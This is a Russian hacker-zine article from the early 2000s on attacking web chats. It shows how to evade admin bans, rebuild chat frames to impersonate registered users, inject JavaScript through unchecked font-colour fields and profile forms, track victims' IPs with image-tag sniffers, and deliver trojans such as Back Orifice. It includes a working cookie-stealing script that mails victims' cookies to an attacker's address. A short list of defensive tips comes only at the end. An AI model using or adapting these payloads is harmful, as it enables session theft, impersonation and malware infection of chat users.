| |
| |
|
|
До того, как рассмотреть нижеследующее, я хотел бы рассказать еще
кое-что о чатах. На этот раз это будет не описанное в предыдущей статье
физичекое устройство, а скорее факторы риска. Итак, на мой взгляд, все
чаты можно разделить по уровню защиты на 4 уровня: 1) Админа нет вообще - делайте что хотите=) 2) Админ вроде и есть, но фиговый или временно ушел покурить - аналогично, но побыстрее, пока он не вернулся или до него не дошло, что вы там собираетесь делать;) 3) Админ есть, но защита слабовата - рисует только IP - юзайте анонимную проксю и меняйте ее, если что нехорошее случится... 4) Админ есть, защита сильна - рисует вдобавок к IP и домен... Это не есть карашоу, это тяжелее... Но в принципе решается это дело тоже до гениального просто - подключаетесь через другого провайдера (через связь которого вас не выкидывали), заходите на сайт, отключаетесь и подключаетесь снова через первого. Все будет нормалек, а если вдруг опять выкинут - просто повторите всю шутку заново=) И еще - если что-то все-таки произошло и в чат вас не пускают никаким образом - попробуйте подчистить кукисы=) Обзор вариантов западла в чатах Основным методом взлома чатов является сохранение той формы, которую вы видите, заходя на сервак, на собственный хард, и изменения формы путем прописки полных адресов и замены строк типа <input type=hidden name= cookie value=SP202134> на <input type=text name=cookie value=SP202134> и последующей сборки окна чата из реальных и сохраненных фреймов. Делается это обычно так: <html> <frameset rows="80%,20%"> <frameset cols="70%,30%"> <frame name="razg" src="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end"> <frame name="rigt" src="http://www.chat.nsk.su/right.html"> </frameset> <frame name="bot" src="start.htm"> </frameset> </html> Start.htm - это и есть тот фрейм который нужно сохранить и изменить. Что это дает??? Возможность обойти зарегистрированные имена и сокрытие своего IP за чужим ID от киллеров. В дальнейшем над этой формой надо еще слегка поизвращаться и довести ее до ума, чтоб сделать отправку скриптов в общий фрейм легкой и приятной... Да, кстати, одной из возможных фенек является прописка скрипта в информацию о себе, которую вы даете при регистрации... Представьте только, как здорово - вы просто регистрируетесь, а каждый чел, который захочет глянуть вашу анкету, получает широкий спектр возможных подлянок - от простого захламления Рабочего стола ненужными окошками до впаривания трояна (где-то посерединке находится и получение IP или кукисов=) для примера привожу известный всем (вдруг не всем?) скрипт ЗАРАЗЫ aka Ученого Кота: <script> for( I=1 ; I<=11 ; I++ ) { if( I==1 ) alert( "Че те надо?????" ); else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че те надо???" ); } alert("а здесь все равно нету нифика..."); top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1; top.frames['Inform'].document.forms[0].Announce.value = "Я люблю тебя, 3APA3A!"; top.frames['Inform'].document.forms[0].submit(); top.frames['Dark'].document.forms[2].submit(); </script> Путем нехитрой модификации скрипта можно добиться поразительных результатов... Но признаюсь - я прописать скрипт в анкету не пробовал - тем более что дырка эта уже почти везде закрыта и регистрационные анкеты сначала просматривают админы... Есть еще одна интересная штука: <script language=javascript> var cook=show_all_cookies(); document.open("cookies",cook); document.write('<form onsubmit="javascript:window.close();" method=post action="mailto:vi20042004@mail.ru" ENCTYPE="text/plain"><input type=hidden name=h1 value=',cook,'><input type=submit value="Нажмите чтобы закрыть"> </form>'); document.close("cookies"); </SCRIPT> Как вы наверняка поняли, это западло, посылающее кукисы вашей жертвы вам на мыло, попробуйте оптимизировать его. Кукисы - это вещь, там хранится и IP жертвы, и ID в чате, и много всего остального, полезного-преполезного=)) Но, кстати, есть один минус - вы светите свое мыло (в примере, как вы поняли, my_mail@mail.ru) Модифицируют форму обычно следующим образом: в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста, как правило, вводимые им значения цвета не проверяются, можно, например, в качестве цвета вместо любимого значения 'black' задать '><script' (если тег печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black"), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '"><script p="'=) Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но нужно отметить что засунуть закрывающий тег тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком. Итак, путем, предназначенным для заподлянства в чате, в том числе и кражи IP, служит использование разрешенных тегов (в большинстве чатов теги вроде <script> естейственно запрещены, и обычно отправка скрипта осуществляется путем использования тега BGSOUND, EMBED, OBJECT, DIV и т.д., обычно это выглядит так: <IMG SRC="*****.js">)для своих темных целей;-) Именно таким путем работают снифферы, например знаменитый чат-сниффер хакзоны, да и мои недалеко ушли, с той только разницей, что лог ведется в другом месте... Самым простым способом является указание на чей-нибудь сниффер в теге SRC непосредственно в общем окне (как все помнят, данный тег выполняется на машине, никого не спрашивая, если только просмотр картинок не отключен) - и все IP у вас в кармане. Рекомендую - зайдите на какой нибудь простенький, но со вкусом чат, покопайтесь в исходнике фреймов, все что можно слейте себе на хард, полистайте книги и напишите свой сниффер - как гласит одно из определений словечка "хакер" - это такой странный человек, которому больше нравится писать свои программы, чем использовать чужие=) Именно по этой причине я не даю ни одной ссылки на существующие в сети снифферы и не даю окончательных, применяемых мной вариантов приведенных скриптов - дорабатывайте сами, труд, батенька, облагораживает человека, нужно учиться, учиться и еще раз учиться, как завещал великий Ленин, а не переписывать чужие скрипты - это вам в голове ничего не прибавит... Мне конечно скриптов не жалко, но разозлили меня откликами на предыдущую статью (набросок имею в виду, где я оказался ЛАМЕРом aka ДЕБИЛом=) порядком, так что звиняйте, хлопцы, бананьев нэма... Но, все-таки, если людям захочется - я ОБЕЩАЮ третью статью, где опубликую все окончательные результаты МОИХ исследований на тему взломов чата и защиты в чате (здесь же и ИРКа будет, наверно, приплетена, идеи и наброски на эту тему уже есть...)Так что думайте. А пока продолжаем. Многих интересует вопрос - а почему сниффера или трояна обычно запускают из сети, а не с своего компьютера? Нельзя, мол, что ли??? Можно!!! Адрес для запуска должен выглядеть так: 127.0.0.1/c:\bo.exe где, что и ежу понятно, 127.0.0.1 - IP компа, у которого прямо на диске С хранится ваш любимый BO... Аналогично может впариваться любая другая примочка, включая скрипты и все прочее... Вот так вот. Теперь несколько слов о том, как защититься от всего того, что я тут расписал - прежде всего, перед заходом на чат отключите отображение картинок, если кто не знает как - в IE Сервис\Свойства обозревателя\Вкладка "Дополнительно", в разделе "Мультимедиа" снять галочку с "Отображать рисунки" - вы ничего не потеряете, в нужное время нужную картинку можно легко рассмотреть, кликнув правой кнопкай и выбрав "Показать рисунок". Во-вторых - не ходите на ссылки, которые вам дают в чате, если не уверены на 100%, что это именно то, что вам нужно. В-третьих - юзайте анонимную проксю. В-четвертых - если возможно, то отключите для отображения все теги, с помощью которых на вашей машине может быть запущен скрипт. В-пятых - пользуйтесь презервативами... ой, кажется это из другой оперы ;) |
| Дизайн и разработка сайта |  |
"Проект Amega" |
© 2000-2005 Все права защищены и охраняются законом.
